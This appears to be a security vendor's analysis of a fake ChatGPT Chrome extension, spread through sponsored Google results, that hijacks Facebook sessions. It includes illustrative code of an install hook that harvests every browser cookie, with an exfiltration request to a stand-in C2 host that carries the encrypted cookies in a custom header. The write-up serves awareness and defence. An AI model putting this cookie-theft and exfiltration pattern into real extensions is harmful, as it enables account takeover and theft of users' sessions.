A few hours after Guardio’s report to Google, the extension was removed from the Chrome Web Store. At the time of removal, the store page reported 9,000+ installs.
The new variant of the FakeGPT Chrome extension, titled “Chat GPT For Google”, is once again targeting your Facebook accounts under the cover of a ChatGPT integration for your browser. This time, threat actors didn’t have to work hard on the look and feel of this malicious ChatGPT-themed extension — they just forked and edited a well-known open-source project that does exactly that. From zero to “hero” in probably less than 2 minutes.
Left: The “FakeGPT” Variant on Chrome Store. Right: The genuine “ChatGPT for Google” extension
The genuine “ChatGPT For Google” extension is based on this open-source project, which gained popularity and millions of users in the past few months. As an open-source project, it is meant to share knowledge and contribute to the developer community — little did they know it would be abused so easily for malicious activity.
This time, the malicious extension is not pushed using sponsored Facebook posts, but rather via malicious sponsored Google search results, as we’ve seen with many other campaigns lately.
And so, you search for “Chat GPT 4”, eager to test out the new algorithm, and end up clicking on a sponsored search result promising you just that. This redirects you to a landing page offering ChatGPT right inside your search results page — all that’s left is to install the extension from the official Chrome Store. This will give you access to ChatGPT from the search results, but it will also compromise your Facebook account in an instant!
Attack flow from Google Search to Compromised Facebook accounts
Based on version 1.16.6 of the open-source project, this FakeGPT variant adds only one specific malicious action, executed right after installation; the rest is essentially identical to the genuine code, leaving no reason for suspicion.
The genuine ChatGPT for Google Open-Source Project page on GitHub
Looking at the OnInstalled handler function that is triggered once the extension is installed, we see the genuine extension using it only to make sure you see the options screen (to log in to your OpenAI account). The forked, now-malicious code, on the other hand, exploits this exact moment to snatch your session cookies, as we can see in this deobfuscated code sample from the malicious extension:
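To make the contrast concrete, here is a minimal Node sketch that mocks the relevant Chrome extension APIs and runs both kinds of OnInstalled handlers side by side. The handler bodies follow the behavior described above; the mock object, variable names, and cookie values are illustrative assumptions, not the sample’s actual code.

```javascript
// Minimal mock of the Chrome extension APIs, so the two handlers can be
// contrasted outside a browser (assumption: real code is obfuscated and
// structured differently).
const chrome = {
  runtime: { onInstalled: { addListener: (fn) => fn({ reason: 'install' }) } },
  tabs: { created: [], create(opts) { this.created.push(opts.url); } },
  cookies: {
    getAll: (filter, cb) =>
      cb([{ domain: '.facebook.com', name: 'c_user', value: '1000123' }]),
  },
};

// Genuine extension: onInstalled merely opens the options page so the user
// can log in to their OpenAI account.
chrome.runtime.onInstalled.addListener(() => {
  chrome.tabs.create({ url: 'options.html' });
});

// Malicious fork: the very same event is abused to grab every cookie in the
// browser the moment the extension is installed.
let harvested = [];
chrome.runtime.onInstalled.addListener(() => {
  chrome.cookies.getAll({}, (cookies) => {
    harvested = cookies; // next steps: filter, encrypt, exfiltrate to the C2
  });
});

console.log(`pages opened: ${chrome.tabs.created.length}, cookies grabbed: ${harvested.length}`);
```

Note that `chrome.cookies.getAll({})` with an empty filter legitimately returns every cookie the browser holds, which is exactly what makes the `cookies` permission so dangerous in a malicious extension.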
What we see here is straightforward cookie hijacking, once again dedicated to Facebook, as can be seen in the following code snippet: the function et() filters Facebook-related cookies out of the full list acquired with the Chrome Extension API. Later on, xa() is used to encrypt everything with AES using the key “chatgpt4google”:
Once the list is ready, it is sent out with a GET request to the C2 server hosted on the workers.dev service — the same service we saw used by the original FakeGPT variant.
The cookie list is encrypted with AES and attached as the X-Cached-Key HTTP header value. This technique is used to sneak the cookies out without DPI (Deep Packet Inspection) mechanisms raising alerts on the packet payload, which is also why the payload is encrypted.
Note that there is no X-Cached-Key header in the HTTP protocol! There is an X-Cache-Key header (without the ‘d’), but it is used for responses, not requests. None of this bothers the scammers, who get exactly what they need from compromised browsers:
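Sketched out, the exfiltration request is nothing more than a GET with the encrypted blob riding in a custom header. The C2 hostname below is a placeholder, not the actual workers.dev subdomain, and the request is only constructed, never sent:

```javascript
// Build (but do not send) a request shaped like the one described above:
// the encrypted cookie list travels in a non-standard "X-Cached-Key" request
// header on a plain GET, so the body stays empty and unremarkable.
function buildExfilRequest(encryptedCookies) {
  return {
    method: 'GET',
    host: 'example-c2.workers.dev', // placeholder, not the real C2 hostname
    path: '/',
    headers: {
      // HTTP defines no X-Cached-Key header; the near-miss spelling
      // (vs. the X-Cache-Key response header) helps it blend in.
      'X-Cached-Key': encryptedCookies,
    },
  };
}

const req = buildExfilRequest('BASE64-ENCRYPTED-COOKIE-LIST');
```

From a defender’s point of view, an outbound GET carrying a large, high-entropy value in an unknown request header is itself a useful detection signal, even when the payload cannot be decrypted inline.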
Decrypting the header value yields an easy-to-read list of all Facebook session cookies currently active in the browser, looking something like this (reduced list):
To the above request, the C2 server responds with a generic 404 error and that’s it — “All Your Facebook are belong to us!”
For threat actors, the possibilities are endless — using your profile as a bot for comments, likes, and other promotional activities, or creating pages and advertisement accounts on the back of your reputation and identity, promoting services that range from legitimate to, most likely, anything but.
With these cookies, your Facebook session can be quickly taken over, your basic account login details changed, and from that point on you lose control of your profile with no way to regain it. This is typically followed by an automatic change of the profile name and picture, probably to yet another fake “Lilly Collins” (which seems to be their favorite), while your private data is harvested for extra profit and then wiped for good to make room for malicious activity.
We’ve seen many user profiles fall for this lately, with many later abused to push further malicious activity inside the Facebook ecosystem, and even plain and simple propaganda of the worst kind.
One quite brutal example is this RV-selling business page, hijacked on March 4th, 2023. The page is still live at its original URL https://www[.]facebook[.]com/shadymaplefarmmarket and is now used to promote ISIS content. Note how Lily Collins is added as the profile picture immediately after the hijack (probably by an automated system used by the scammers). The picture is later updated to ISIS-themed imagery, possibly after the account was sold to another actor looking to propagate this kind of content through high-profile stolen Facebook accounts:
Example of a Hijacked Facebook Business Page used to promote ISIS Content
The misuse of ChatGPT’s brand and popularity keeps rising, and it is used not only for Facebook account harvesting, nor only via malicious fake Chrome extensions. Major services offered by Facebook, Google, and other big names are under continuous attack and abuse, and at the end of it all, the ones hit hardest are us, the users.
Awareness is a crucial factor in dodging these attacks and keeping your data private. Yet it is increasingly clear that even home and casual internet users need security protection and detection services tailored to their needs, closing the huge security gaps that hit users en masse.
Read more about the “FakeGPT” Campaign:
This article was published in collaboration with Guardio Labs.
Image source: unsplash.com